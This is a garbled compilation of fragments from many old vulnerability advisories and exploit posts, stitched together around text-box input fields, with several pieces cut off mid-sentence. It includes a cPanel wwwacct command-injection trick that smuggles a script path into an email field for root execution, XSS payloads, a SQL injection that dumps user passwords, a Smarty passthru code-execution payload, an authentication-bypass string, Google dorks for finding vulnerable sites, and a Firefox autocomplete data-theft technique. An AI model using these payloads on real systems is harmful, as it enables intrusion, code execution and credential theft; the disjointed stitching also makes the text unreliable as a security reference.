text field
example :
http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab
it means you got a access to wwwacct in the scripts folder (Th3 r00t)
so u can run other command with root access like that
./scripts/wwwactt domain.com domain password ali@hackerz.ir;./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl)
that u can Likewise run it on the web base program.what u need to do is just write ali@hackerz.ir;./home/hackerz/public_html/do.pl in Email text box when u want to create an account.
()()()()()()()()()()()()()
Test it:
++++++++++++++++++++++++++
Step 1
-->
<html>
<head>
<title>die</title>
<style type='text/css'>
.textbox
{
padding: 2px 3px;
}
</style>
</head>
ZDI-10-069: Microsoft Office Publisher File Conversion TextBox Processing Buffer Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-069
April 13, 2010
-- CVE ID:
CVE-2010-0479
-- Affected Vendors:
Microsoft
=> XSS in Profile (parameter: explanation, module: profile, url:
admin/user/profile)
The 'explanation' parameter is not properly sanitized when adding new
* single-line textfield
* multi-line textfield
* checkbox
* list selection
* freeform list
* URL
CVE ID : CVE-2009-0664
It was discovered that mahara, an electronic portfolio, weblog, and
resume builder, is prone to cross-site scripting (XSS) attacks because
of missing input sanitization of the introduction text field in user
profiles and any text field in a user view.
The oldstable distribution (etch) does not contain mahara.
—————————————
Descrition:
This vulnerability can be explored writing in the descritption textbox
a mailicous (or not) code
link: http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery&mode=edit&gid=[galleryID]&_wpnonce=0b3c0996ed
In the description textbox write the text:
network management controls to give you quite possibly the most
advanced, yet affordable Ethernet router to date.
[Bug Description]
'Ping tools' web interface does not validate the ip textfield size
leading to a Denial Of Service flaw by changing its size and sending
more than 500 characters to it. This textfield is also prone to Cross
Site Scripting. An authenticated user is required to exploit these
security flaws.
* For earlier versions, injecting a simple <SCRIPT> suffices:
<SCRIPT>alert('XSS')<SCRIPT>
* Some versions limit the permitted characters, and thus require the tester
to inset Java-script without utilizing tags, by injecting a script into the
text box as follows:
");alert('XSS');//
* Later versions appear to also enforce server-side length restrictions on
the vulnerable parameters. As a result, multiple separate injections are
required to achieve script execution, such as:
http://localhost:8181/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E
Stored XSS:
http://localhost:8181/editPage.yaws?node=home
The large textbox on the editPage.yaws page is vulnerable to xss. This is the"text" post variable:
<script>alert(1)</script>
# Xss Address : http://Example/panel/index.php?option=forums
# Variable : [resellerdomain]
######################################
# How Work With it :
# Login In VistaReseller Panel And Open Url
# Insert http://"<script>alert('xss')</script> in Text box and click (Add) Button .
# Now Open the Url Again & See xss msg
######################################
# Solution : Edit Source Code And Filter Variable With htmlspecialchar() function .......
######################################
# Khashayar Fereidani Email : irancrash[at]gmail[at]com
VULNERABLE VARIABLES:
=====================
contextid (query string parameter)
schema (query string parameter)
userNameVal ("User Name" text box)
POC URL: http://www.website.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');//
VULNERABLE VARIABLE:
====================
1.1 PoC:
============
http://localhost/webnews/search.php?
Postdata:
1. an attacker have to input a keyword into the keyword textfield. This is required for successfull exploitation.
2. An attacker will post the follwing sql statement to categorie id field:
') union select 1,2,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from wn_user where userid=1/**
- -----------/
* Disabling the MHTML protocol handler. To disable the protocol handler,
follow these steps:
1. Click Start and then click Run. Enter regedit.exe in the text box and
click OK.
2. Navigate to
HKEY_CLASSES_ROOT\CLSID\{05300401-BCBC-11d0-85E3-00C04FD85AB4}.
3. Right click {05300401-BCBC-11d0-85E3-00C04FD85AB4} and select
Permissions.
necessary changes.
Details follow:
Miroslav Lichvar discovered that Newt incorrectly handled rendering in a
text box. An attacker could exploit this and cause a denial of service or
possibly execute arbitrary code with the privileges of the user invoking
the program.
Updated packages for Ubuntu 6.06 LTS:
Vendor Site: Liferay.net
Version affected: Liferay Enterprise Portal 4.3.1
Demo:http://www.liferay.net/c/portal/login?tabs1=forgot-password
Class: Input Validation Error
Overview: Liferay fails to sufficiently sanitize user-supplied input data in "email address" text box by pressing the "Send New Password" button.
Examples:
1."><script>alert('xss')</script>
2.<html><b>XSS</b></font></html>
3."><iframe>
You need an user account and you need to change your "display name" in:
{php}passthru($_SERVER[HTTP_CMD]);{/php}
Register and click on Preferences, look at the "User Information" tab, inside the
"Real name" text field write the code above, then click on Change.
Google dorks:
"by bitweaver" Version powered +boards
"You are running bitweaver in TEST mode"|"bitweaver * White Screen of Death"
Vendor Site: http://www.phpgedview.net
Version: 4.1
Common Path: yoursite.com/genealogy/login.php
Overview: Genealogy program which allows you to view and edit your genealogy on your website. It fails to sufficiently sanitize user-supplied input data in "User Name" text box leaving password blank and pressing the "Login" button, also web address XSS.
Example:
1.<html><font color="Red"><b>XSS</b></font></html>
2.yoursite.com/genealogy/login.php?login.php?action=login&username="><iframe>
3.yousite.com/genealogy/login.php?url=/index.php?JOSH="><iframe>
Vendor Site: http://abledesign.com/
Version affected: ???
Demo: http://abledesign.com/demo/pframe.php
Class: Input Validation Error
Overview: Dynamic Picture Frame is a PHP script which allows you to add a variety of picture frames of any size to images on your website. Dynamic Picture Frame fails to sufficiently sanitize user-supplied input data in "Image URL" text box by pressing the "submit" button.
Example:
1.<html><font color="Red"><b>XSS</b></font></html>
|| Note :
For use this vulnerability you need access to censor words panel .
1.First login and go to : http://site/path/index.php?action=postsettings;sa=censor
click on "Click here to add another word." for add new row .
set new text box : ircrash => "<script>alert('Vulnerable')</script>
and save page .
2.Open new typic and set title : ircrash , fill all fields and post typic .
3.Open forum home page . you see alert : Vulerable
You can set any html or java script code . hackers can home deface forum or set activex for virus .
(where VALID_UID is a valid user uid, and ID is the id of the message we
want to forward)
here, regardless of the mailing list to which the specified uid is
registered, a text field is shown, allowing a malicious user to enter an
email address for receiving a copy of the message #ID
2) Any unauthenticated user can read the subject of any message sent by
the system just by iterating on mid and setting randomly an uid; e.g.:
------------
A malicious web page can extract out all the data stored within the autocomplete history of a user's Firefox browser. The web page must convince a user to hold down the left or right-arrow keys then the contents of the autocomplete popup can be read. This may includes the search history box within the browser, or other personal details.
Analysis
--------
A malicious web page can be created that includes a text field with the same 'name' attribute as data entered on other sites (e.g 'q' for Google). The form autocompletion popup in Firefox can then be triggered and manipulated by a variety of key presses. For example, by pressing the 'a' key, autocomplete entries starting with that letter will be shown. Entries in the poupup can be selected by using the up/ down arrow keys. When the left or right arrow key is pressed, the currently selected entry from the popup is entered into the text field and can be read through JavaScript.
In Firefox, a web page can use the 'createEvent' and 'initKeyEvent' JavaScript methods to create synthetic key events. It was discovered that these events could be used to trigger an autocomplete popup and change the currently selected entry in the popup.
However, it was not possible for synthetic events to cause the text field to be filled with the current entry. Therefore some user interaction is required to enable the web page to steal the contents of the drop-down. If a web page can convince a user to hold down or repeatedly press the left or right-arrow keys, it can systematically grab each entry in the drop-down box.
Engeman is a Brasilian software for maintenance control.
Version tested: 6.x.x and prior. Next versions appears vulnerable too.
The attacker can inject sql codes in username textbox:
SQL dump affter injection:
select nome,senha,diasexp,dataltsen,permitetroca from cfgusr where nome='NULL' OR NOME<>'1'
RESOLUTION
HP has made an update available to resolve the vulnerability. The update can be downloaded from http://www.3com.com/swd/jsp/user/downloadsindex.jsp
Note: In the "Product Number or Name Search" text box, enter "3CREVF100-73" and click "Go".
Product
Filename
Version
|
